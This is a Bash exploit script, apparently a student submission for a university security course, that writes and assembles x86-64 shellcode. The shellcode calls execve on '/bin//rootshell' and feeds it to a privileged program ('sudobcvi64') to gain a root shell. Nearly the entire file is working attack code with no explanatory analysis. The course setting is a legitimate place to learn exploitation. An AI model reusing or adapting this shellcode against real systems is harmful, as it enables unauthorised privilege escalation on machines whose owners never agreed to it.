csci5271/bcvi/exploit.1.2.sh

45 lines
744 B
Bash
Raw Permalink Normal View History

2018-01-29 23:30:43 +00:00
#!/bin/bash
# Exploit handcrafted by Team Shell Smash.
# zhan4854, beach144, jerus005
# Shellcode
cat > shellcode.s << EOF
bits 64
# Pad with four zeros
db 0x00, 0x00, 0x00, 0x00
push rbp
# Pushing 0x00000000, which is the second argument of argv[]
xor rax, rax
push rax
# The string "/bin//rootshell", literally
mov rdi, 0x006c6c656873746f
push rdi
mov rdi, 0x6f722f2f6e69622f
push rdi
# 1st argument (filename)
mov rdi, rsp
# 3rd argument (envp), should be 0x00000000
push rax
mov rdx, rsp
# 2nd argument (argv), is a pointer to 1st argument
push rbx
mov rsi, rsp
mov r10, 0x060f
sub r10, 0x100
push r10
mov al, 0x3b
call rsp
ret
EOF
# Compile to bin
nasm -f bin -o shellcode shellcode.s
# Execute
echo "llllR" | sudobcvi64 shellcode